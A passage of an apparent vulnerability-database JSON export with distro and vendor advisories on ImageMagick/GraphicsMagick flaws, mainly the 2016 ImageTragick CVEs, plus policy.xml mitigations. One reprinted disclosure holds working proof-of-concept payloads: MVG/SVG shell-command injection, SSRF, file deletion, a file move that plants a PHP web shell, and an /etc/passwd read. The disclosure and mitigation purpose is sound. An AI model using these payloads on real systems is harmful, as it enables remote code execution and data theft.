"baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449"], "modified": "2016-09-28T05:59:24", "id": "MGASA-2016-0325", "href": "https://advisories.mageia.org/MGASA-2016-0325.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-04-18T11:19:34", "description": "It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. 
A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application (CVE-2016-3714). It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717). A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images (CVE-2016-3718). The imagemagick package has been updated to version 6.9.4-2 to fix these issues and several other bugs. 
\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-20T11:38:30", "type": "mageia", "title": "Updated imagemagick/ruby-rmagic packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-20T11:38:30", "id": "MGASA-2016-0188", "href": "https://advisories.mageia.org/MGASA-2016-0188.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2021-06-08T18:38:50", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-31T18:06:21", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: GraphicsMagick-1.3.28-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2018-01-31T18:06:21", "id": "FEDORA:DFB316077DF1", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ISKX4WLRTYSRACWKG6AHO35A6HAVWHBB/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-08T18:38:50", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-31T21:59:04", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: GraphicsMagick-1.3.28-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11102", "CVE-2017-11139", "CVE-2017-11140", "CVE-2017-11636", "CVE-2017-11637", "CVE-2017-11641", "CVE-2017-11643", "CVE-2017-13147", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17782", "CVE-2017-17783", "CVE-2017-17912", "CVE-2017-17913", "CVE-2017-17915"], "modified": "2018-01-31T21:59:04", "id": "FEDORA:C16F56079703", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/M7ZZRPUL2DNIAIFTNGOFAV2VTBMMSRXA/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:38", "description": "GraphicsMagick is a comprehensive image processing package which is initial ly based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performan ce of the software. 
", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-30T00:57:16", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: GraphicsMagick-1.3.32-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2019-06-30T00:57:16", "id": "FEDORA:C7F6A6178920", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/PF62B5PJA2JDUOCKJGUQO3SPL74BEYSV/", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T18:41:38", "description": "GraphicsMagick is a comprehensive image 
processing package which is initially based on ImageMagick 5.5.2, but which has undergone significant re-work by the GraphicsMagick Group to significantly improve the quality and performance of the software. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-30T02:27:02", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: GraphicsMagick-1.3.32-1.fc29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2019-06-30T02:27:02", "id": "FEDORA:408C160062DD", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WHIKB4TP6KBJWT2UIPWL5MWMG5QXKGEJ/", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "altlinux": [{"lastseen": "2022-06-10T03:07:14", "description": "6.8.4.10-alt3.M70P.1 built May 20, 2016 Andrey Cherepanov in task [#164801](<https://git.altlinux.org/tasks/164801/>) \n--- \nMay 18, 2016 Andrey Cherepanov \n \n \n - Apply security patches from Debian:\n ImageTragick: The coders EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT,\n SHOW, WIN, and PLT are disabled via policy.xml file, since they are\n vulnerable to code injection. This mitigates CVE-2016-3714,\n CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, and CVE-2016-3718.\n Since ImageMagick reverts to its internal SVG renderer (which uses\n MVG coder) if Inkscape or RSVG is not used, the option --with-rsvg\n is included. Closes: 823542. In addition, some other actions were\n taken with respect to these vulnerabilities:\n - Drop the PLT/Gnuplot decoder, which was vulnerable to command\n injection.\n - Some sanitization for input filenames in http/https delegates is\n added.\n - Indirect filename are now authorized by policy.\n - Indirect reads with label:@ are prevented.\n - Less secure coders (such as MVG, TEXT, and MSL) require explicit\n reference in the filename (e.g. 
mvg:my-graph.mvg).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-20T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package ImageMagick version 6.8.4.10-alt3.M70P.1", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-20T00:00:00", "id": "682061AC284886CF3E2D521ABCE02271", "href": "https://packages.altlinux.org/en/p7/srpms/ImageMagick/1991632811917746209", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "edition": 2, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, 
"impactScore": 5.9}, "published": "2016-05-04T00:00:00", "title": "ImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "id": "EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103", "href": "", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\nvulnerabilities in ImageMagick.\nWe've reported these issues to developers of ImageMagick and they made a\nfix for RCE in sources and released new version (6.9.3-9 released\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\nfix seems to be incomplete. We are still working with developers.\n\nImageMagick: Multiple vulnerabilities in image decoder\n\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\n(potentially remote) code execution\n\nInsufficient filtering for filename passed to delegate's command allows\nremote code execution during conversion of several file formats.\n\nImageMagick allows to process files with external libraries. This\nfeature is called 'delegate'. It is implemented as a system() with\ncommand string ('command') from the config file delegates.xml with\nactual value for different params (input/output filenames etc). Due to\ninsufficient %M param filtering it is possible to conduct shell command\ninjection. 
One of the default delegate's command is used to handle https\nrequests:\n\"wget\" -q -O \"%o\" \"https:%M\"\nwhere %M is the actual link from the input. It is possible to pass the\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\n-la'. (wget or curl should be installed)\n\n$ convert 'https://example.com\"|ls \"-la' out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\n\nThe most dangerous part is ImageMagick supports several formats like\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\nthis file format and idea of the local file read vulnerability in\nImageMagick, see below), maybe some others - which allow to include\nexternal files from any supported protocol including delegates. As a\nresult, any service, which uses ImageMagick to process user supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\nthis issue.\n\nexploit.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\npop graphic-context\n\nexploit.svg\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" standalone=\"no\"?>\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\n\"http://www.w3.org/1999/xlink\">\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\n</svg>\n\n$ convert exploit.mvg out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\nImageMagick tries to guess the type of the file by it's content, so\nexploitation doesn't depend on the file extension. You can rename\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. 
In\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\nbe used as a protection to filter file by it's content and creates\nadditional attack vectors (e.g. via 'less exploit.jpg', because\n'identify' is invoked via lesspipe.sh).\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\n(or curl) should be installed on the system for successful PoC\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\n\nAll other issues also rely on dangerous ImageMagick feature of external\nfiles inclusion from any supported protocol in formats like svg and mvg.\n\n2. CVE-2016-3718 - SSRF\nIt is possible to make HTTP GET or FTP request:\n\nssrf.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(http://example.com/)'\npop graphic-context\n\n$ convert ssrf.mvg out.png # makes http request to example.com\n\n3. CVE-2016-3715 - File deletion\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\nprotocol which deletes files after reading:\n\ndelete_file.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\npopgraphic-context\n\n$ touch /tmp/delete.txt\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\n\n4. CVE-2016-3716 - File moving\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. 
msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick):\n\nfile_move.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\npopgraphic-context\n\n/tmp/msl.txt\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<image>\n<read filename=\"/tmp/image.gif\" />\n<write filename=\"/var/www/shell.php\" />\n</image>\n\n/tmp/image.gif - image with php shell inside\n(https://www.secgeek.net/POC/POC.gif for example)\n\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\n\n5. CVE-2016-3717 - Local file read (independently reported by original\nresearch author - https://hackerone.com/stewie)\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol:\n\nfile_read.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'label:@...c/passwd'\npop graphic-context\n\n$ convert file_read.mvg out.png # produces file with text rendered from\n/etc/passwd\n\n\nHow to mitigate the vulnerability.\n\nAvailable patches appear to be incomplete.\nIf you use ImageMagick or an affected library, we recommend you mitigate\nthe known vulnerabilities by doing at least one these two things (but\npreferably both!):\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\ncorresponding to the image file types you support before sending them to\nImageMagick for processing. (see FAQ for more info)\n2. Use a policy file to disable the vulnerable ImageMagick coders. 
The\nglobal policy for ImageMagick is usually found in \"/etc/ImageMagick\".\nThis policy.xml example will disable the coders EPHEMERAL, URL, HTTPS, MVG, and\nMSL:\n\n<policymap>\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\n</policymap>\n\n\nVulnerability Disclosure Timeline:\nApril, 21 2016 - file read vulnerability report for one of My.Com\nservices from https://hackerone.com/stewie received by Mail.Ru Security\nTeam. Issue is reportedly known to ImageMagick team.\nApril, 21 2016 - file read vulnerability patched by My.Com development team\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\noriginal report\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\ndevelopment team\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\n(incomplete fix)\nApril, 30 2016 - fixed ImageMagick version 6.9.3-9 published (incomplete fix)\nMay, 1 2016 - ImageMagick informed of the fix bypass\nMay, 2 2016 - limited disclosure to 'distros' mailing list\nMay, 3 2016 - public disclosure at https://imagetragick.com/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL61974123 - ImageMagick vulnerability CVE-2016-3718", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], 
"modified": "2016-09-02T00:00:00", "id": "SOL61974123", "href": "http://support.f5.com/kb/en-us/solutions/public/k/61/sol61974123.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-08-16T21:24:15", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. 
For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
